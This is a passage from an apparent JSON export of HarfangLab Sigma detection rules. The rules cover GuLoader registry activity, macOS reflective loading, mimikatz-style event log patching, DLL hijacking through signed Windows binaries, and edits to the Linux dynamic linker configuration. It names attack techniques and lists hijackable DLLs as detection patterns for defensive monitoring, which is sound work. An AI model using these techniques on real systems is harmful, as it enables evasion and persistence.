"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607322Z",
"creation_date": "2026-03-23T11:45:34.607326Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607333Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye",
"https://attack.mitre.org/techniques/T1055/",
"https://attack.mitre.org/software/S0561/"
],
"name": "t1055_guloader_registry_activity.yml",
"content": "title: Possible GuLoader Registry Activity\nid: fe310d5f-8420-465b-a622-8a6959b418ac\ndescription: |\n Detects suspicious registry values set by a NSIS GuLoader Installer.\n GuLoader is a small NSIS installer downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive.\n It is recommended to analyze the binary making the process access to look for malicious contents.\nreferences:\n - https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye\n - https://attack.mitre.org/techniques/T1055/\n - https://attack.mitre.org/software/S0561/\ndate: 2024/05/07\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1055\n - attack.command_and_control\n - attack.t1071.001\n - attack.t1566.002\n - attack.execution\n - attack.t1106\n - attack.t1204.001\n - attack.t1204.002\n - attack.s0561\n - classification.Windows.Source.Registry\n - classification.Windows.Malware.GuLoader\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n Details:\n - 'kernel32::CreateFileA(m r? , i 0x*, i 0, p 0, i 4, i 0x*, i 0)*'\n - 'kernel32::SetFilePointer(i r?, i *, i 0,i 0)'\n - 'kernel32::VirtualAlloc(i 0,i *, i *, i 0x*)*'\n - 'kernel32::ReadFile(i r?, i r?, i *,*i 0, i 0)'\n - 'user32::EnumWindows(i r? ,i 0)'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fe310d5f-8420-465b-a622-8a6959b418ac",
"rule_name": "Possible GuLoader Registry Activity",
"rule_description": "Detects suspicious registry values set by a NSIS GuLoader Installer.\nGuLoader is a small NSIS installer downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive.\nIt is recommended to analyze the binary making the process access to look for malicious contents.\n",
"rule_creation_date": "2024-05-07",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055",
"attack.t1071.001",
"attack.t1106",
"attack.t1204.001",
"attack.t1204.002",
"attack.t1566.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fe3727cd-5557-4a6a-af9f-914026f32dc0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617188Z",
"creation_date": "2026-03-23T11:45:34.617191Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617198Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://slyd0g.medium.com/understanding-and-defending-against-reflective-code-loading-on-macos-e2e83211e48f",
"https://attack.mitre.org/techniques/T1620/"
],
"name": "t1620_reflective_loading_library.yml",
"content": "title: Suspicious Executable Reflective Loading File Loaded\nid: fe3727cd-5557-4a6a-af9f-914026f32dc0\ndescription: |\n Detects the loading of a specific file related to reflective binary execution on macOS.\n Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads.\n It is recommended to check for malicious activities by the process loading the file.\nreferences:\n - https://slyd0g.medium.com/understanding-and-defending-against-reflective-code-loading-on-macos-e2e83211e48f\n - https://attack.mitre.org/techniques/T1620/\ndate: 2024/06/18\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1620\n - classification.macOS.Source.LibraryLoaded\n - classification.macOS.Behavior.DLLHijacking\nlogsource:\n category: library_event\n product: macos\ndetection:\n selection:\n ImageLoaded|contains: '/NSCreateObjectFileImageFromMemory-'\n\n exclusion_common_folders:\n Image|startswith:\n - '/System/Library/'\n - '/Library/Application Support/'\n - '/Applications/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n\n exclusion_steam:\n Image|startswith: '/Users/*/Library/Application Support/Steam/steamapps/common/'\n\n exclusion_video:\n Image: '/Volumes/RX 10 Audio Editor/Install RX 10 Audio Editor.app/Contents/MacOS/osx-x86_64'\n\n exclusion_audiolens:\n Image: '/Volumes/Audiolens/Install Audiolens.app/Contents/MacOS/osx-x86_64'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fe3727cd-5557-4a6a-af9f-914026f32dc0",
"rule_name": "Suspicious Executable Reflective Loading File Loaded",
"rule_description": "Detects the loading of a specific file related to reflective binary execution on macOS.\nAdversaries may reflectively load code into a process in order to conceal the execution of malicious payloads.\nIt is recommended to check for malicious activities by the process loading the file.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1620"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fe4a638f-f575-4374-8e3b-797ceb68ee70",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072246Z",
"creation_date": "2026-03-23T11:45:34.072248Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072253Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c",
"https://github.com/gentilkiwi/mimikatz/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_windows_eventlog_patching.yml",
"content": "title: Windows Event Log Patched\nid: fe4a638f-f575-4374-8e3b-797ceb68ee70\ndescription: |\n Detects an attempt to open an svchost process with mimikatz-like permissions to patch the event log service.\n Mimikatz targets wevtsvc.dll (the Windows Event Service DLL) that is loaded in the svchost.exe responsible for the EventLog service.\n This is only an in-memory modification, once the service is restarted or computer is rebooted, the EventLog service will return to normal.\n Adversaries may disrupt Windows event logs to avoid possible detection of their malicious activities.\n It is recommended to analyze the context of this action, with the help of the process tree and to look for other malicious actions on the host.\nreferences:\n - https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c\n - https://github.com/gentilkiwi/mimikatz/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2021/06/21\nmodified: 2025/05/12\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.s0002\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\svchost.exe'\n TargetProcessUser: 'NT AUTHORITY\\LOCAL SERVICE'\n TargetProcessCommandLine|contains: 'svchost.exe -k LocalServiceNetworkRestricted'\n GrantedAccess: '0x1438'\n\n exclusion_mcafee:\n ProcessProcessName:\n - 'mfetp.exe'\n - 'mfehcs.exe'\n - 'FireSvc.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'McAfee, Inc.'\n - 'Musarubra US LLC'\n\n exclusion_kaspersky:\n ProcessProcessName:\n - 'soyuz.exe' # C:\\Program Files (x86)\\Kaspersky Lab\\Endpoint Agent\\soyuz.exe\n - 'avp.exe' # C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Endpoint Security 10 for Windows SP1\\avp.exe / C:\\Program Files (x86)\\Kaspersky Lab\\KES.11.10.0\\avp.exe\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Kaspersky Lab JSC'\n - 'AO Kaspersky Lab'\n - 'Kaspersky Lab'\n - 'Kaspersky Labs GmbH'\n\n exclusion_checkpoint:\n ProcessImage: '?:\\Program Files (x86)\\CheckPoint\\Endpoint Security\\Anti-Malware\\epam_svc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Check Point Software Technologies Ltd.'\n\n exclusion_total_uninstall:\n ProcessImage: '?:\\Program Files\\Total Uninstall Essential\\Tu.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'MARTAU GAVRILA'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fe4a638f-f575-4374-8e3b-797ceb68ee70",
"rule_name": "Windows Event Log Patched",
"rule_description": "Detects an attempt to open an svchost process with mimikatz-like permissions to patch the event log service.\nMimikatz targets wevtsvc.dll (the Windows Event Service DLL) that is loaded in the svchost.exe responsible for the EventLog service.\nThis is only an in-memory modification, once the service is restarted or computer is rebooted, the EventLog service will return to normal.\nAdversaries may disrupt Windows event logs to avoid possible detection of their malicious activities.\nIt is recommended to analyze the context of this action, with the help of the process tree and to look for other malicious actions on the host.\n",
"rule_creation_date": "2021-06-21",
"rule_modified_date": "2025-05-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fe514257-7cae-4868-8038-9d6629dfa431",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077944Z",
"creation_date": "2026-03-23T11:45:34.077947Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077951Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bytecodegenerator.yml",
"content": "title: DLL Hijacking via BytecodeGenerator.exe\nid: fe514257-7cae-4868-8038-9d6629dfa431\ndescription: |\n Detects potential Windows DLL Hijacking via BytecodeGenerator.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'BytecodeGenerator.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\urlmon.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fe514257-7cae-4868-8038-9d6629dfa431",
"rule_name": "DLL Hijacking via BytecodeGenerator.exe",
"rule_description": "Detects potential Windows DLL Hijacking via BytecodeGenerator.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fe6176aa-6160-4f56-a09c-fd15d655fb88",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078530Z",
"creation_date": "2026-03-23T11:45:34.078532Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078536Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securelist.com/wastedlocker-technical-analysis/97944/",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mblctr.yml",
"content": "title: DLL Hijacking via MBLCTR.exe\nid: fe6176aa-6160-4f56-a09c-fd15d655fb88\ndescription: |\n Detects potential Windows DLL Hijacking via MBLCTR.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securelist.com/wastedlocker-technical-analysis/97944/\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MBLCTR.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\batmeter.dll'\n - '\\dwmapi.dll'\n - '\\mmdevapi.dll'\n - '\\uxtheme.dll'\n - '\\winmm.dll'\n - '\\wtsapi32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fe6176aa-6160-4f56-a09c-fd15d655fb88",
"rule_name": "DLL Hijacking via MBLCTR.exe",
"rule_description": "Detects potential Windows DLL Hijacking via MBLCTR.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fe94c773-1caa-44a0-876e-01e264b73dea",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094827Z",
"creation_date": "2026-03-23T11:45:34.094829Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094833Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_at.yml",
"content": "title: DLL Hijacking via at.exe\nid: fe94c773-1caa-44a0-876e-01e264b73dea\ndescription: |\n Detects potential Windows DLL Hijacking via at.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'at.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\cryptdll.dll'\n - '\\d3d10_1core.dll'\n - '\\d3d10_1.dll'\n - '\\d3d10core.dll'\n - '\\d3d10.dll'\n - '\\d3d11.dll'\n - '\\dxgi.dll'\n - '\\IPHLPAPI.DLL'\n - '\\netutils.dll'\n - '\\NtlmShared.dll'\n - '\\schedcli.dll'\n - '\\snmpapi.dll'\n - '\\sspicli.dll'\n - '\\winmm.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fe94c773-1caa-44a0-876e-01e264b73dea",
"rule_name": "DLL Hijacking via at.exe",
"rule_description": "Detects potential Windows DLL Hijacking via at.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fe966a39-d58c-4285-9fc4-25b1b3a10425",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.677667Z",
"creation_date": "2026-03-23T11:45:35.297608Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297612Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://tbhaxor.com/exploiting-shared-library-misconfigurations/",
"https://attack.mitre.org/techniques/T1574/006/"
],
"name": "t1574_006_ld_config_modified.yml",
"content": "title: Dynamic Linker Configuration Modified\nid: fe966a39-d58c-4285-9fc4-25b1b3a10425\ndescription: |\n Detects an attempt to modify the configuration of the dynamic linker (/etc/ld.so.conf).\n These modifications can be used by attackers to hijack library loading processes, enabling malicious library injection, process monitoring, or the concealment of malicious activities through library preloading.\n It is recommended to investigate all dynamic linker configuration changes and identify unauthorized library loading attempts.\nreferences:\n - https://tbhaxor.com/exploiting-shared-library-misconfigurations/\n - https://attack.mitre.org/techniques/T1574/006/\ndate: 2022/11/10\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1574.006\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Hijacking\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path:\n - '/etc/ld.so.conf'\n - '/etc/ld.so.conf.d/*'\n - TargetPath:\n - '/etc/ld.so.conf'\n - '/etc/ld.so.conf.d/*'\n is_read_access:\n Kind: 'access'\n Permissions: 'read'\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf'\n - '/usr/bin/python* /usr/bin/dnf'\n - 'dnf upgrade'\n - 'dnf update'\n - 'dnf reinstall'\n - 'dnf remove'\n exclusion_snapd:\n - ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessParentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessGrandparentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n exclusion_rpm:\n - ProcessImage: '/usr/bin/rpm'\n - ProcessParentCommandLine|startswith: '/bin/sh /var/tmp/rpm-tmp.'\n - ProcessGrandparentCommandLine|startswith: '/bin/sh /var/tmp/rpm-tmp.'\n exclusion_pacman:\n ProcessImage: '/usr/bin/pacman'\n exclusion_package_cleanup:\n ProcessCommandLine|startswith: '/usr/bin/python /bin/package-cleanup '\n\n exclusion_pum_worker:\n ProcessCommandLine|startswith: '/usr/libexec/platform-python -Estt /usr/local/psa/admin/sbin/pum_worker'\n\n exclusion_kaniko:\n ProcessImage: '/kaniko/executor'\n\n exclusion_sophos:\n ProcessImage: 